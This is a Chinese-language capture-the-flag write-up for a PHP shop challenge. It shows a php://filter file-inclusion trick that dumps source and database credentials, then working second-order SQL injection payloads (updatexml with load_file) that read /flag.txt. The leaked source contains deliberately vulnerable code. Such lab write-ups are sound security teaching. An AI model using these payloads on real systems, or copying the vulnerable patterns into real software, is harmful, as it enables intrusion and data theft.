打开场景,查看源码,找到hint
<!--?file=?--> 所以考虑文件读漏洞 尝试?file=php://filter/convert.base64-encode/reosurce=index.php 成功回显
PD9waHAKCmluaV9zZXQoJ29wZW5fYmFzZWRpcicsICcvdmFyL3d3dy9odG1sLycpOwoKLy8gJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwokZmlsZSA9IChpc3NldCgkX0dFVFsnZmlsZSddKSA/ICRfR0VUWydmaWxlJ10gOiBudWxsKTsKaWYgKGlzc2V0KCRmaWxlKSl7CiAgICBpZiAocHJlZ19tYXRjaCgiL3BoYXJ8emlwfGJ6aXAyfHpsaWJ8ZGF0YXxpbnB1dHwlMDAvaSIsJGZpbGUpKSB7CiAgICAgICAgZWNobygnbm8gd2F5IScpOwogICAgICAgIGV4aXQ7CiAgICB9CiAgICBAaW5jbHVkZSgkZmlsZSk7Cn0KPz4KCjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJlbiI CjxoZWFkPgo8bWV0YSBjaGFyc2V0PSJ1dGYtOCI Cjx0aXRsZT5pbmRleDwvdGl0bGU CjxiYXNlIGhyZWY9Ii4vIj4KPG1ldGEgY2hhcnNldD0idXRmLTgiIC8 Cgo8bGluayBocmVmPSJhc3NldHMvY3NzL2Jvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI CjxsaW5rIGhyZWY9ImFzc2V0cy9jc3MvY3VzdG9tLWFuaW1hdGlvbnMuY3NzIiByZWw9InN0eWxlc2hlZXQiPgo8bGluayBocmVmPSJhc3NldHMvY3NzL3N0eWxlLmNzcyIgcmVsPSJzdHlsZXNoZWV0Ij4KCjwvaGVhZD4KPGJvZHk CjxkaXYgaWQ9ImgiPgoJPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICA8aDI MjA3N WPkeWUruS6hizkuI3mnaXku73lrp7kvZPlhbjol4/niYjlkJc/PC9oMj4KICAgICAgICA8aW1nIGNsYXNzPSJsb2dvIiBzcmM9Ii4vYXNzZXRzL2ltZy9sb2dvLWVuLnBuZyI PCEtLUxPR09MT0dPTE9HT0xPR08tLT4KICAgICAgICA8ZGl2IGNsYXNzPSJyb3ciPgoJCQk8ZGl2IGNsYXNzPSJjb2wtbWQtOCBjb2wtbWQtb2Zmc2V0LTIgY2VudGVyZWQiPgogICAgICAgICAgICAgICAgPGgzPuaPkOS6pOiuouWNlTwvaDM CiAgICAgICAgICAgICAgICA8Zm9ybSByb2xlPSJmb3JtIiBhY3Rpb249Ii4vY29uZmlybS5waHAiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0iYXBwbGljYXRpb24veC13d3ctdXJsZW5jb2RlZCI CiAgICAgICAgICAgICAgICAgICAgPHA CiAgICAgICAgICAgICAgICAgICAgPGgzPuWnk WQjTo8L2gzPgogICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBjbGFzcz0ic3Vic2NyaWJlLWlucHV0IiBuYW1lPSJ1c2VyX25hbWUiPgogICAgICAgICAgICAgICAgICAgIDxoMz7nlLXor506PC9oMz4KICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9InN1YnNjcmliZS1pbnB1dCIgbmFtZT0icGhvbmUiPgogICAgICAgICAgICAgICAgICAgIDxoMz7lnLDlnYA6PC9oMz4KICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9InN1YnNjcmliZS1pbnB1dCIgbmFtZT0iYWRkcmVzcyI CiAgICAgICAgICAgICAgICAgICAgPC9wPgogICAgICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9J2J0biBidG4tbGcgIGJ0bi1zdWIgYnRuLXdoaXRlJyB0eXBlPSJzdWJtaXQiPuaIkeato aYr mAgemSseS5i S6ujwvYnV0dG9uPgogICAgICAgICAgICAgICAgPC9mb3JtPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2Pgo8L2Rpdj4KCjxkaXYgaWQ9ImYiPgogICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KCQk8ZGl2IGNsYXNzPSJyb3ciPgogICAgICAgICAgICA8aDIgY2xhc3M9Im1iIj7orqLljZXnrqHnkIY8L2gyPgogICAgICAgICAgICA8YSBocmVmPSIuL3NlYXJjaC5waHAiPgogICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iYnRuIGJ0bi1sZyBidG4tcmVnaXN0ZXIgYnRuLXdoaXRlIiA 5oiR6KaB5p l6K6i5Y2VPC9idXR0b24 CiAgICAgICAgICAgIDwvYT4KICAgICAgICAgICAgPGEgaHJlZj0iLi9jaGFuZ2UucGhwIj4KICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9ImJ0biBidG4tbGcgYnRuLXJlZ2lzdGVyIGJ0bi13aGl0ZSIgPuaIkeimgeS/ruaUueaUtui0p WcsOWdgDwvYnV0dG9uPgogICAgICAgICAgICA8L2E CiAgICAgICAgICAgIDxhIGhyZWY9Ii4vZGVsZXRlLnBocCI CiAgICAgICAgICAgICAgICA8YnV0dG9uIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1yZWdpc3RlciBidG4td2hpdGUiID7miJHkuI3mg7PopoHkuoY8L2J1dHRvbj4KICAgICAgICAgICAgPC9hPgoJCTwvZGl2PgoJPC9kaXY CjwvZGl2PgoKPHNjcmlwdCBzcmM9ImFzc2V0cy9qcy9qcXVlcnkubWluLmpzIj48L3NjcmlwdD4KPHNjcmlwdCBzcmM9ImFzc2V0cy9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KPHNjcmlwdCBzcmM9ImFzc2V0cy9qcy9yZXRpbmEtMS4xLjAuanMiPjwvc2NyaXB0Pgo8c2NyaXB0IHNyYz0iYXNzZXRzL2pzL2pxdWVyeS51bnZlaWxFZmZlY3RzLmpzIj48L3NjcmlwdD4KPC9ib2R5Pgo8L2h0bWw CjwhLS0/ZmlsZT0/LS0 Cg== base64解码
<?php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['file'] : null); if (isset($file)){ if (preg_match("/phar|zip|bzip2|zlib|data|input|/i",$file)) { echo('no way!'); exit; } @include($file); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>index</title> <base href="./"> <meta charset="utf-8" /> <link href="assets/css/bootstrap.css" rel="stylesheet"> <link href="assets/css/custom-animations.css" rel="stylesheet"> <link href="assets/css/style.css" rel="stylesheet"> </head> <body> <div id="h"> <div class="container"> <h2>2077发售了,不来实体收藏版吗?</h2> <img class="logo" src="./assets/img/logo-en.png"><!--LOGOLOGOLOGOLOGO--> <div class="row"> <div class="col-md-8 col-md-offset-2 centered"> <h3>提交订单</h3> <form role="form" action="./confirm.php" method="post" enctype="application/x-www-urlencoded"> <p> <h3>姓名:</3>
<input type="text" class="subscribe-input" name="user_name">
<h3>电话:</h3>
<input type="text" class="subscribe-input" name="phone">
<h3>地址:</h3>
<input type="text" class="subscribe-input" name="address">
</p>
<button class='btn btn-lg btn-sub btn-white' type="submit">我正是送钱之人</button>
</form>
</div>
</div>
</div>
</div>
<div id="f">
<div class="container">
<div class="row">
<h2 class="mb">订单管理</h2>
<a href="./search.php">
<button class="btn btn-lg btn-register btn-white" >我要查订单</button>
</a>
<a href="./change.php">
<button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
</a>
<a href="./delete.php">
<button class="btn btn-lg btn-register btn-white" >我不想要了</button>
</a>
</div>
</div>
</div>
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/retina-1.1.0.js"></script>
<script src="assets/js/jquery.unveilEffects.js"></script>
</body>
</html>
<!--?file=?-->
注意到了ini_set(‘open_basedir’, ‘/var/www/html/’);也就是说这个页面不存在目录穿越,页面里在form表单里给了confirm.php,下载解码
<?php
require_once "config.php";
//var_dump($_POST);
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = $_POST["address"];
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if($fetch->num_rows>0) {
$msg = $user_name."已提交订单";
}else{
$sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
$re = $db->prepare($sql);
$re->bind_param("sss", $user_name, $address, $phone);
$re = $re->execute();
if(!$re) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单提交成功";
}
} else {
$msg = "信息不全";
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>确认订单</title>
<base href="./">
<meta charset="utf-8"/>
<link href="assets/css/bootstrap.css" rel="stylesheet">
<link href="assets/css/custom-animations.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
</head>
<body>
<div id="h">
<div class="container">
<img class="logo" src="./assets/img/logo-zh.png">
<div class="row">
<div class="col-md-8 col-md-offset-2 centered">
<?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>
<a href="./index.php">
<button class='btn btn-lg btn-sub btn-white'>返回</button>
</a>
</div>
</div>
</div>
</div>
<div id="f">
<div class="container">
<div class="row">
<p style="margin:35px 0;"><br></p>
<h2 class="mb">订单管理</h2>
<a href="./search.php">
<button class="btn btn-lg btn-register btn-white" >我要查订单</button>
</a>
<a href="./change.php">
<button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
</a>
<a href="./delete.php">
<button class="btn btn-lg btn-register btn-white" >我不想要了</button>
</a>
</div>
</div>
</div>
<script src="assets/js/jquery.min.js"></script>
可以看到这个页面过滤的关键字包括select,update啥的,就知道往sql注入里想了,先简单看一下。给了config.php。继续下载解码
<?php
ini_set("open_basedir", getcwd() . ":/etc:/tmp");
$DATABASE = array(
"host" => "127.0.0.1",
"username" => "root",
"password" => "root",
"dbname" =>"ctfusers"
);
$db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']);
后面分析了confirm.php里面的insert发现用了预定义,并没有找到利用点,但是index.php里面还有其他页面,继续
change.php
<?php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = addslashes($_POST["address"]);
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
$result = $db->query($sql);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单修改成功";
} else {
$msg = "未找到订单!";
}
}else {
$msg = "信息不全";
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>修改收货地址</title>
<base href="./">
<link href="assets/css/bootstrap.css" rel="stylesheet">
<link href="assets/css/custom-animations.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
</head>
<body>
<div id="h">
<div class="container">
<div class="row">
<div class="col-md-8 col-md-offset-2 centered">
<p style="margin:35px 0;"><br></p>
<h1>修改收货地址</h1>
<form method="post">
<p>
<h3>姓名:</h3>
<input type="text" class="subscribe-input" name="user_name">
<h3>电话:</h3>
<input type="text" class="subscribe-input" name="phone">
<h3>地址:</h3>
<input type="text" class="subscribe-input" name="address">
</p>
<p>
<button class='btn btn-lg btn-sub btn-white' type="submit">修改订单</button>
</p>
</form>
<?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>
</div>
</div>
</div>
</div>
<div id="f">
<div class="container">
<div class="row">
<p style="margin:35px 0;"><br></p>
<h2 class="mb">订单管理</h2>
<a href="./index.php">
<button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
</a>
<a href="./search.php">
<button class="btn btn-lg btn-register btn-white" >我要查订单</button>
</a>
<a href="./delete.php">
<button class="btn btn-lg btn-register btn-white" >我不想要了</button>
</a>
</div>
</div>
</div>
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/retina-1.1.0.js"></script>
<script src="assets/js/jquery.unveilEffects.js"></script>
</body>
</html>
在这里发现了问题
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
新地址进行了单引号转义,但是old_address和user_id都是我们之前在insert阶段数据库存的,在insert阶段由于预定义的关系单引号之类的特殊字符会被转义 但是在存到数据库中时又会恢复到单引号的状态,而且address在confirm.php页面都没有进行关键词过滤 这样的话,就构成了二次注入 在原始页面地址页面注入payload:
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,50)),0x7e),1)#
修改页面随便输,成功报错注入 读两次flag就好了 第一次读出来的:flag{3b97108b-7cd8-4ef6-aa38-b 第二次读出来的:b0c9fddd7376} 拼接:flag{3b97108b-7cd8-4ef6-aa38-b0c9fddd7376} 参考视频链接:https://www.bilibili.com/video/bv1o34y1b7SH